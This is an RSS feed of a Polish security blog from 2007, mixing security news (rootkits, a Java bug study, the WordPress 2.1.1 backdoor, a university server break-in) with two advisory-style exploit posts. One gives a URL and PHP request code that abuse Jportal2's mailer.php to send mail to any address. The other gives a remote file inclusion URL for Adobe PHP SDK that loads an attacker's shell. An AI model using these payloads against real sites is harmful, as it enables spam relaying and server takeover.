<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Komputery to nasza pasja ...</title>
	<atom:link href="http://v56r.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://v56r.wordpress.com</link>
	<description>Hack, Bezpieczeństwo, IT, Security, Antywirus, Windows, Linux, Zabezpieczenia, Luki,</description>
	<lastBuildDate>Wed, 07 Mar 2007 19:32:25 +0000</lastBuildDate>
	<language>pl</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='v56r.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Komputery to nasza pasja ...</title>
		<link>http://v56r.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://v56r.wordpress.com/osd.xml" title="Komputery to nasza pasja ..." />
	<atom:link rel='hub' href='http://v56r.wordpress.com/?pushpress=hub'/>
		<item>
		<title># Jportal2 wysyłanie maila na dowolny adres</title>
		<link>http://v56r.wordpress.com/2007/03/07/jportal2-wysylanie-maila-na-dowolny-adres/</link>
		<comments>http://v56r.wordpress.com/2007/03/07/jportal2-wysylanie-maila-na-dowolny-adres/#comments</comments>
		<pubDate>Wed, 07 Mar 2007 19:32:25 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
		
		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/07/jportal2-wysylanie-maila-na-dowolny-adres/</guid>
		<description><![CDATA[Podatne wersje: Jportal2 z modułem mailer.php Blad wystepuje w pliku mailer.php, ktory nie sprawdza czy adres e-mail podany w zmiennej $to jest na liscie e-mail&#8217;i portalu. Najprostsza metoda wykorzystania jest spreparowanie adresu URL http://adres.strony.com/mailer.php?to=adres@email.com&#38;subject=TestExploita&#38; from_name=Admin&#38;from_mail=admin@adres.com&#38;body=TestExploita&#38;ok=wyslij&#38;cmd=sendmail Takie proste wyexploitowanie jest mozliwe dzieki temu, ze Jportal nie sprawdza czy zmienna jest z tablicy POST czy GET. Jesli, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=15&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span class="bugtraq_pod_tytul"><img src="http://img49.imageshack.us/img49/2883/bugtraqnu0.gif" align="left" height="200" width="213" />Podatne wersje:</span><span class="bugtraq_dane"> Jportal2 z modułem mailer.php</span></p>
<p>Blad wystepuje w pliku mailer.php, ktory nie sprawdza czy adres e-mail podany w zmiennej $to jest na liscie e-mail&#8217;i portalu.<br />
Najprostsza metoda wykorzystania jest spreparowanie adresu URL</p>
<p>http://adres.strony.com/mailer.php?to=adres@email.com&amp;subject=TestExploita&amp;</p>
<p>from_name=Admin&amp;from_mail=admin@adres.com&amp;body=TestExploita&amp;ok=wyslij&amp;cmd=sendmail</p>
<p>Takie proste wyexploitowanie jest mozliwe dzieki temu, ze Jportal nie sprawdza czy zmienna jest z tablicy POST czy GET.<br />
Jesli, jednak ktorys admin pokusilby sie o dodanie sprawdzania czy zmienna jest z tablicy POST czy GET mozna dziure wykorzystac inna metoda</p>
<p>$fp = fsockopen(&#8222;adres.strony.com&#8221;,80,$errno,$errstr,1);<br />
if(!$fp)die(&#8222;Nie mozna nawiazac polaczenia&#8221;);</p>
<p>$data = &#8222;to=adres@email.com&amp;subject=TestExploita&amp;from_name=Admin&amp;from_mail=admin@adres.com&amp;body=TestExploita&amp;ok=wyslij&amp;cmd=sendmail&#8221;;<br />
$out  = &#8222;POST /mailer.php HTTP/1.1\r\n&#8221;;</p>
<p>$out .= &#8222;Host: adres.strony.com\r\n&#8221;;<br />
$out .= &#8222;Content-length: &#8222;.strlen($data).&#8221;\n&#8221;;<br />
$out .= &#8222;Content-type: application/x-www-form-urlencoded\r\n&#8221;;<br />
$out .= &#8222;Connection: Close\r\n\r\n&#8221;;</p>
<p>$out .= $data;<br />
?&gt;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=15&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/07/jportal2-wysylanie-maila-na-dowolny-adres/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>

		<media:content url="http://img49.imageshack.us/img49/2883/bugtraqnu0.gif" medium="image" />
	</item>
		<item>
		<title># Rootkity &#8211; małe, wredne i trudne do usunięcia</title>
		<link>http://v56r.wordpress.com/2007/03/07/rootkity-male-wredne-i-trudne-do-usuniecia/</link>
		<comments>http://v56r.wordpress.com/2007/03/07/rootkity-male-wredne-i-trudne-do-usuniecia/#comments</comments>
		<pubDate>Wed, 07 Mar 2007 15:37:23 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
				<category><![CDATA[Virii]]></category>

		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/07/rootkity-male-wredne-i-trudne-do-usuniecia/</guid>
		<description><![CDATA[Joanna Rutkowska, specjalistka ds. zabezpieczeń, zaprezentowała kilka różnych metod, za pomocą których wyspecjalizowane rootkity mogą oszukać nawet najlepsze dostępne obecnie mechanizmy obronne. Rutkowska zaprezentowała wyniki swoich badań podczas poświęconej komputerowemu bezpieczeństwu konferencji Black Hat w Arlington, w stanie Virginia. Z jej prezentacji wynika, iż jeśli rootkit jest wystarczająco zaawansowany, aktualnie nie ma całkowicie skutecznej metody [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=12&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img src="http://img180.imageshack.us/img180/7318/wirusgj0.jpg" align="left" height="156" width="137" />Joanna Rutkowska, specjalistka ds. zabezpieczeń, zaprezentowała kilka różnych metod, za pomocą których wyspecjalizowane rootkity mogą oszukać nawet najlepsze dostępne obecnie mechanizmy obronne.</p>
<p>Rutkowska zaprezentowała wyniki swoich badań podczas poświęconej komputerowemu bezpieczeństwu konferencji Black Hat w Arlington, w stanie Virginia. Z jej prezentacji wynika, iż jeśli rootkit jest wystarczająco zaawansowany, aktualnie nie ma całkowicie skutecznej metody jego wykrycia w systemie.</p>
<p>Niektóre sprzętowe mechanizmy obrony przed rootkitami (m.in. takie produkty jak Tribble, CoPilot i RAM Capture Tool) działają w ten sposób, że wykonują &#8222;obraz&#8221; pamięci RAM (jest to najpewniejszy sposób na wykrycie obecności pewnych rodzajów rootkitów).</p>
<p>Rutkowska pokazała jednak trzy rodzaje ataków, skutecznie radzących sobie z tego typu zabezpieczeniami. Jeden z nich prowadził do zawieszenia komputera w momencie, gdy mechanizm zabezpieczający próbował uzyskać dostęp do stanu pamięci RAM, inny polegał na udostępnieniu do wglądu jedynie pewnej części pamięci. Ostatni typ ataku polegał na całkowitym maskowaniu rzeczywistego stanu pamięci fizycznej podczas jej skanowania. Druga z wymienionych technik w niektórych przypadkach pozwalałaby na odnalezienie śladów działania złośliwego oprogramowania w systemie, ale bez możliwości jego identyfikacji, zaś dzięki trzeciej oprogramowanie typu malware mogłoby nigdy nie zostać odnalezione.</p>
<p>Rutkowska twierdzi: &#8222;Żyjemy w XXI wieku, ale najwyraźniej nie potrafimy miarodajnie odczytać stanu pamięci naszych komputerów. Może powinniśmy pomyśleć o zmianie architektury systemów tak, aby można je było w pewien sposób zweryfikować&#8221;.</p>
<p align="right">Źródło: PC World Komputer</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/12/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/12/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=12&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/07/rootkity-male-wredne-i-trudne-do-usuniecia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>

		<media:content url="http://img180.imageshack.us/img180/7318/wirusgj0.jpg" medium="image" />
	</item>
		<item>
		<title># Java bezpieczniejsza niż C/C++</title>
		<link>http://v56r.wordpress.com/2007/03/07/java-bezpieczniejsza-niz-cc/</link>
		<comments>http://v56r.wordpress.com/2007/03/07/java-bezpieczniejsza-niz-cc/#comments</comments>
		<pubDate>Wed, 07 Mar 2007 15:33:01 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
				<category><![CDATA[Security IT]]></category>

		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/07/java-bezpieczniejsza-niz-cc/</guid>
		<description><![CDATA[Projekty open-source&#8217;owe napisane w Javie zawierają mniej błędów niż aplikacje napisane w innych językach &#8211; wynika z badań przeprowadzonych przez firmę Fortify Software, zajmującą się audytem oprogramowania. Nie oznacza to jednak, że oprogramowanie pisane w Javie jest wolne od usterek &#8211; specjaliści z Fortify Software twierdzą, iż w zbadanych przez nich próbkach kodu napisanego w [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=11&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img src="http://img340.imageshack.us/img340/4049/securitylogolm0.jpg" align="left" height="132" width="132" />Projekty open-source&#8217;owe napisane w Javie zawierają mniej błędów niż aplikacje napisane w innych językach &#8211; wynika z badań przeprowadzonych przez firmę Fortify Software, zajmującą się audytem oprogramowania. Nie oznacza to jednak, że oprogramowanie pisane w Javie jest wolne od usterek &#8211; specjaliści z Fortify Software twierdzą, iż w zbadanych przez nich próbkach kodu napisanego w tym języku wciąż było sporo błędów.</p>
<p>Fortify Software opublikowała właśnie raport na temat błędów w open-source&#8217;owych aplikacjach, wykrytych w ramach prowadzone przez firmę oraz University of Maryland projektu Java Open Review. JOR monitoruje wiele projektów &#8211; jednak na potrzeby najnowszego raportu skupiono się na czterech &#8211; Hibernate, Spring, Struts oraz Tomcat. Okazało się, iż projekty te zawierają średnio 0,07 błędu na tysiąc linii kodu.</p>
<p>Jak mówią przedstawiciele Fortify Software, współczynnik ten jest o rząd wielkości niższy niż w przypadku podobnych projektów, pisanych w C i C++ &#8211; ale zastrzegają jednocześnie, że w i projektach &#8222;javowych&#8221; wciąż jest sporo do poprawienia. Liczne problemy wykryto m.in. w przykładowych fragmentach kodu oraz w interfejsach niektórych bilbliotek.</p>
<p>&#8222;Sposób, w jaki napisane są niektóre projekty, niejako zachęca programistów wykorzystujących ten kod, do popełniania błędów. Dostarczyliśmy dowód, że Java jest bezpieczna &#8211; teraz chcemy upewnić się, że open-source&#8217;owi developerzy potrafią naprawić błędy w swoich produktach, zanim staną się one zagrożeniem dla bezpieczeństwa użytkowników&#8221; &#8211; czytamy w oświadczeniu wydanym przez Fortify Software.</p>
<p>Warto zaznaczyć, że najczęściej wykrywanymi problemami w oprogramowaniu napisanym w Javie były błędy typu cross-site scripting.</p>
<p>Źródło: IDG, Fortify Softwar</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/11/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/11/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/11/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/11/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/11/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=11&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/07/java-bezpieczniejsza-niz-cc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>

		<media:content url="http://img340.imageshack.us/img340/4049/securitylogolm0.jpg" medium="image" />
	</item>
		<item>
		<title># Atak na bloga</title>
		<link>http://v56r.wordpress.com/2007/03/07/atak-na-bloga/</link>
		<comments>http://v56r.wordpress.com/2007/03/07/atak-na-bloga/#comments</comments>
		<pubDate>Wed, 07 Mar 2007 15:17:20 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
		
		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/07/atak-na-bloga/</guid>
		<description><![CDATA[Użytkownicy, którzy pobrali system obsługi blogów WordPress w wersji 2.1.1, powinni niezwłocznie pobrać najnowszą edycję oznaczoną numerem 2.1.2. Okazuje się, że serwer projektu został zaatakowany, a cyberprzestępcy podmienili wersję 2.1.1 spreparowanym przez siebie oprogramowaniem zawierającym tylne drzwi ułatwiające infiltrację kodu PHP. Autorzy systemu nie podali szczegółów włamania na serwer, ujawnili jedynie o niebezpieczeństwie, jakie niesie [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=9&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img src="http://v56r.files.wordpress.com/2007/03/wordpress-logo.miniatura.jpg?w=500" align="left" />Użytkownicy, którzy pobrali system obsługi blogów WordPress w wersji 2.1.1, powinni niezwłocznie pobrać najnowszą edycję oznaczoną numerem 2.1.2.</p>
<p>Okazuje się, że serwer projektu został zaatakowany, a cyberprzestępcy podmienili wersję 2.1.1 spreparowanym przez siebie oprogramowaniem zawierającym tylne drzwi ułatwiające infiltrację kodu PHP.</p>
<p>Autorzy systemu nie podali szczegółów włamania na serwer, ujawnili jedynie o niebezpieczeństwie, jakie niesie za sobą instalacja WordPress 2.1.1.</p>
<p>Wersja 2.1.2, oprócz tego, że jest już bezpieczna, zawiera także kilka poprawek zwiększających wydajność oprogramowania.</p>
<p>źródło: heise-security.co.uk</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/9/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/9/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/9/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=9&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/07/atak-na-bloga/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>

		<media:content url="http://v56r.files.wordpress.com/2007/03/wordpress-logo.miniatura.jpg" medium="image" />
	</item>
		<item>
		<title># Atak na serwery Politechniki Koszalińskiej</title>
		<link>http://v56r.wordpress.com/2007/03/04/atak-na-serwery-politechniki-koszalinskiej/</link>
		<comments>http://v56r.wordpress.com/2007/03/04/atak-na-serwery-politechniki-koszalinskiej/#comments</comments>
		<pubDate>Sun, 04 Mar 2007 19:18:47 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
				<category><![CDATA[Ataki (hack)]]></category>

		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/04/atak-na-serwery-politechniki-koszalinskiej/</guid>
		<description><![CDATA[Atak był skuteczny. Padły dwa serwery, w tym jeden o nazwie &#8222;LEW”. Skutki odczuli ludzie i instytucje w całym regionie. W koszalińskim ratuszu nie działa poczta elektroniczna, a strona internetowa miejskiej komendy policji jest zamknięta. - Nasz serwer &#8222;LEW&#8221;, do którego podłączonych jest wiele instytucji, miał być potężny i chyba dlatego informatycy nazwali go mianem [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=7&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Atak był skuteczny. Padły dwa serwery, w tym jeden o nazwie &#8222;LEW”. Skutki odczuli ludzie i instytucje w całym regionie. W koszalińskim ratuszu nie działa poczta elektroniczna, a strona internetowa miejskiej komendy policji jest zamknięta.</p>
<p>- Nasz serwer &#8222;LEW&#8221;, do którego podłączonych jest wiele instytucji, miał być potężny i chyba dlatego informatycy nazwali go mianem króla zwierząt &#8211; mówi prof. Tomasz Hesse, prorektor koszalińskiej uczelni.</p>
<p>Od soboty (24.02) jednak, gdy zaatakowali hakerzy, &#8222;LEW&#8221; nie działa. &#8211; Na szczęście informatycy byli w pracy. Spostrzegli włamanie do &#8222;LWA” i drugiego serwera, i od razu je wyłączyli. &#8211; Tylko nie piszcie, że to paraliż lub katastrofa. To zwykła awaria &#8211; przekonuje profesor. Na razie nie wiadomo, jakie szkody wyrządzili hakerzy, pokonując zabezpieczenia.</p>
<p>- Jedynym rozwiązaniem problemu było wyłączenie serwerów, co też Politechnika uczyniła. Atak musiał być dobrze przygotowany, bo trudno o lepiej zabezpieczone serwery, niż te na Politechnice &#8211; twierdzi informatyk z firmy dysponującej kilkudziesięcioma komputerami.</p>
<p>- Usunięcie awarii może trwać kilka godzin, a czasem kilka dni. Na szczęście dane są archiwizowane, więc wszystko wróci do normy &#8211; uspokaja. On też codziennie notuje co najmniej kilkaset prób włamania na firmowy serwer.</p>
<p>- Nie otrzymaliśmy zgłoszenia o włamaniu do serwera Politechniki ani o jakichkolwiek szkodach &#8211; twierdzi Beata Gliszczyńska, rzecznik koszalińskiej policji, która też padła ofiarą hakerów. Strona internetowa komendy nie działa.</p>
<p>- To nie jest dla nas wielki problem. Poczta działa, bo jest zainstalowana na serwerze Komendy Wojewódzkiej &#8211; tłumaczy. Z kolei Grzegorz Śliżewski, rzecznik ratusza, jest niepocieszony, bo ogromna część urzędowej korespondencji jest wysyłana mailem. &#8211; Trudno mówić o stratach materialnych, ale awaria zdezorganizowała pracę urzędu &#8211; przyznaje.</p>
<p>- Gdyby to był problem dla naszych odbiorców, to na pewno bym o tym wiedział. Ale nikt się do mnie nie zgłosił &#8211; bagatelizuje skutki awarii profesor Hesse. Nie potrafił nam jednak powiedzieć, jakie instytucje korzystają z usług informatycznych Politechniki. &#8211; Ostatnio podłączaliśmy sąd, policję i Urząd Miejski.</p>
<p>Rektor zapewniał, że w środę wieczorem, po pięciu dniach awarii, serwer ruszy.</p>
<p>Autor: Cezary Sołowij<br />
źródło: Głos Koszaliński</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/v56r.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/v56r.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/v56r.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/v56r.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/v56r.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=7&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://v56r.wordpress.com/2007/03/04/atak-na-serwery-politechniki-koszalinskiej/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/39f6b5064669cb1edda1578334af9030?s=96&#38;d=identicon" medium="image">
			<media:title type="html">v56r</media:title>
		</media:content>
	</item>
		<item>
		<title># Adobe php sdk Remote File Include Vulnerabilities</title>
		<link>http://v56r.wordpress.com/2007/03/01/mm/</link>
		<comments>http://v56r.wordpress.com/2007/03/01/mm/#comments</comments>
		<pubDate>Thu, 01 Mar 2007 18:59:32 +0000</pubDate>
		<dc:creator>v56r</dc:creator>
				<category><![CDATA[Bugtraq]]></category>

		<guid isPermaLink="false">http://v56r.wordpress.com/2007/03/01/mm/</guid>
		<description><![CDATA[Poziom Ataku: Bardzo Krytyczny Typ Ataku : Zdalny Autor: Crackers_Child Kontakt: crackers_child (at) sibersavascilar (dot) com Błąd występuje w pliku CachedGateway.php: include_once("app/Gateway.ph p"); include_once(AMFPHP_BASE . "custom/CachedExecutionAction.php"); Kod nadużycia: www.atakowana.strona.pl/adobe_php_sdk_path/librar ies/amfphp/amf-core/custom/CachedG ateway.php?AMFPHP_BASE=sh3ll?_<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=v56r.wordpress.com&amp;blog=831200&amp;post=5&amp;subd=v56r&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Poziom Ataku: Bardzo Krytyczny<br />
Typ Ataku : Zdalny<br />
Autor:  Crackers_Child<br />
Kontakt:  crackers_child (at) sibersavascilar (dot) com</p>
<p>Błąd występuje w pliku CachedGateway.php:<strong><code></code></strong></p>
<p><strong><code>include_once("app/Gateway.ph p");<br />
include_once(AMFPHP_BASE . "custom/CachedExecutionAction.php");<br />
</code></strong></p>
<p><strong><code> Kod nadużycia:<br />
</code></strong></p>
<p><strong><code> www.atakowana.strona.pl/adobe_php_sdk_path/librar ies/amfphp/amf-core/custom/CachedG<br />
ateway.php?AMFPHP_BASE=sh3ll?_</code></strong></p>
